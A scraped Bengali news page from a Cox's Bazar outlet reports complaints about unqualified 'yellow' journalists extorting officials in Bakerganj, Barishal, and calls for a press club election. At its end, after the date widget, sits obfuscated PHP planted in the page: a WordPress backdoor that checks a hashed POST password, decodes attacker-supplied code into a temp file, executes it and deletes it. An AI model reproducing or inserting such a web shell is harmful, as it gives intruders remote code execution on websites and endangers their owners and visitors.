• বুধবার, ১৯ জুন ২০২৪, ০৫:০৯ অপরাহ্ন
সর্বশেষ খবর
শুধু এক টুকরো মাংস চায়, তাড়িয়ে দিলেও বার বার হাত বাড়ায় সৈকতে ঘুরতে গিয়ে দুর্বৃত্তের ছুরিকাঘাতে নিহত হোটেল কর্মী ঈদগাঁওতে পুকুরে ডুবে আদিবা-ইলমার মৃত্যু প্রথমবারের মতো প্রধানমন্ত্রীর সফর সঙ্গী হতে যাচ্ছেন নবনিযুক্ত প্রেস সচিব নাইমুল ইসলাম খান   সন্দ্বীপে যুবকের বিরুদ্ধে ভিসা দেয়ার নামে টাকা হাতিয়ে নেয়ার অভিযোগ : ভুক্তভোগীর উপর হামলা পাসপোর্ট ফিরে পেতে প্রধানমন্ত্রী ও ডিজির হস্তক্ষেপ কামনা :৪ বছরেও নাবায়ন হয়নি নির্যাতিত সাংবাদিক ফরিদুলের ডিজিটাল পাসপোর্ট শপথ গ্রহণ করেছেন কক্সবাজারের ৩ উপজেলা পরিষদের নবনির্বাচিত চেয়ারম্যান কক্সবাজারে ৬ নং বিপদ সংকেত  কক্সবাজারে মাংসের বাজারে কসাইদের অরাজকতা, বিক্রি হচ্ছে অন্য প্রাণীর গোস্ত বন্দরে ৩ নম্বর সংকেত,উপকূলে ১০ফুট জলোচ্ছ্বাসের আশংকা

বরিশালের বাকেরগঞ্জে গণমাধ্যম রক্ষায় প্রেস ক্লাবের নির্বাচনের বিকল্প নেই

কক্সবাজারবানী
আপডেট : মঙ্গলবার, ১২ জানুয়ারি, ২০২১

ডেস্ক রিপোর্ট/মোঃজিয়াউল হক :

বরিশাল বিভাগের অন্যতম উপজেলা হিসেবে পরিচিত বাকেরগঞ্জ উপজেলা। ১৪ টি ইউনিয়ন নিয়ে আয়তনেও দীর্ঘ পথ হলেও কমতি নেই যেন গণমাধ্যম ও সংবাদকর্মীদের। অপেশাদার ও কার্ড ধারি হলুদ সাংবাদিকদের কাছে দিনে দিনে জিম্মি হয়ে পড়েছে রাজনৈতিক নেতা সহ পুলিশ প্রশাসন ও উপজেলার সর্বস্তরের জনগণ। সরকার পেশাদার অপেশার সাংবাদিক চিহ্নিত করতে না পারায় খুব কম সময়ে বাকেরগঞ্জে ভুঁইফোড় সাংবাদিকে ভরে গেছে।

সম্প্রতি কয়েকটি ঘটনায় জনমনে প্রশ্ন দেখা দিয়েছে কয়েকজন ইউনিয়ন চেয়ারম্যানের দুর্নীতি তুলে ধরে ফেসবুকে লেখালেখি করার পরে ওই চেয়ারম্যানদেরকে নিয়ে বিভিন্ন হোটেল রেস্তোরায় বৈঠকের মাধ্যমে অর্থ আদায়ের অভিযোগ উঠেছে।

বাকেরগঞ্জ উপজেলায় নামেমাত্র প্রেসক্লাব থাকলেও কোন কার্যক্রম এমনকি অফিসও নেই। প্রায় এক যুগের কাছাকাছি সময় ধরে প্রেসক্লাবের নির্বাচন বন্ধ রয়েছে। এই মেয়াদ উত্তীর্ণ কমিটি নিয়ে উপজেলায় বিভিন্ন সাংবাদিক মহলের মধ্যে উত্তেজনা দেখা দিয়েছে। এ কারণেই প্রতিবছর ব্যাঙের ছাতার মত একাধিক সাংবাদিক সংগঠন বেড়েই চলছে। পাশাপাশি অশিক্ষিত অযোগ্য মাদক ব্যবসায়ীরা জড়িয়ে পড়েছে সাংবাদিকদের মতো মহান পেশায়। পেশাদার সাংবাদিকেরা হয়ে পড়েছেন কোণঠাসা। সাম্প্রতিক সময়ে বাকেরগঞ্জ প্রেসক্লাবের নাম ব্যবহার করে একাধিক ব্যক্তি ফেসবুক আইডি দিয়ে রাজনৈতিক নেতা, পুলিশ প্রশাসন, গণমাধ্যমকর্মীদেরকে নিয়ে বিভিন্ন রকম অসত্য মনগড়া মিথ্যা সংবাদ প্রকাশ করায় বাকেরগঞ্জ থানায় লিখিত অভিযোগ দায়ের করা হলেও তেমন কোনো ব্যবস্থা গ্রহণ করেননি থানা পুলিশ।

সম্প্রতি কয়েকটি গণমাধ্যমে দেওয়া এক সাক্ষাৎকারে সময়ের দক্ষিণ অঞ্চল সম্পাদক ও প্রকাশক, জাতীয় দৈনিক সমাচার দর্পণ পত্রিকার ক্রাইম রিপোর্টার, প্রথম সকাল পত্রিকার সিনিয়র স্টাফ রিপোর্টার একথা বলেন। এসময় তিনি নিজেদের অভ্যন্তরিন কোন্দল ও রেষারেষির কারনে সাম্প্রতিক সময়ে বাকেরগঞ্জ নজিরবিহীন সাংবাদিক সংঘর্ষ, হামলা, মামলার ঘটনায় উদ্বেগ প্রকাশ করে বলেন, প্রত্যেকটি ঘটনায় দৃর্বৃত্তদের উৎসাহিত করেছে কতিপয় দালাল চাটুকার অপেশাদার রাক্ষুসে সাংবাদিকরা।

সরকার ও স্থানীয় প্রশাসনের উচিত এদেরকে চিহ্নিত করে জরুরি ব্যবস্থা নেওয়া।
অন্যথায় বিপদগামী এসব সুবিধাভোগীরা গণমাধ্যম ও রাষ্ট্রকেও বেকায়দায় ফেলবে।
অন্যথায় তিনি বাকেরগঞ্জের গণমাধ্যম ও সাংবাদিকদের সামনে কঠিন বিপদের আশংকা প্রকাশ করেন।

কাজেই সরকারের সকল এজেন্সি সহ সিনিয়র সাংবাদিকদের উচিত পেশাদার ও অপেশাদার সাংবাদিক চিহ্নিত করা, কে লিখতে জানে, কে জানেনা, প্রাইমারির সার্টিফিকেট পর্যন্ত নেই অথচ কোমরে অাইডি কার্ড ঝুলিয়ে থানা বা প্রশাসনের দুয়ারে দুয়ারে ঘুর ঘুর করে সাধারন মানুষদের জিম্মি করছে, তাদের চিহ্নিত করে এখনি ব্যবস্থা না নিলে পুরো উপজেলাবাসীর এই জিম্মিদশা থেকে রক্ষা পাবে না।

অনলাইন স্বাক্ষাৎকারে বাকেরগঞ্জ উপজেলা অাওয়ামীলীগের সাধারণত সম্পাদক ও বার বার নির্বাচিত মেয়র লোকমান হোসেন ডাকুয়া বলেন, অন্তত নিজেদের সম্মান রক্ষায় সকলের উচিত পেশাদার ও অপেশাদার সাংবাদিক চিহ্নিত করে অতি শীঘ্রই বাকেরগঞ্জ প্রেসক্লাবের নিরপেক্ষ সুষ্ঠু সুন্দর একটি নির্বাচনের মাধ্যমে গণমাধ্যমকে রক্ষা করা। প্রেস ক্লাবের পাশাপাশি অন্য যে সকল সাংবাদিক সংগঠন রয়েছে সকলেরই এজন্যই মতবিরোধ ভুলে সকল পেশাদার সাংবাদিকদের ঐক্যবদ্ধ হওয়ার বিকল্প নেই।


আরো বিভন্ন নিউজ দেখুন

ই-পেপার

আজকের দিন-তারিখ

  • বুধবার (বিকাল ৫:০৯)
  • ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ
  • ১৩ই জিলহজ, ১৪৪৫ হিজরি
  • ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ (বর্ষাকাল)
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}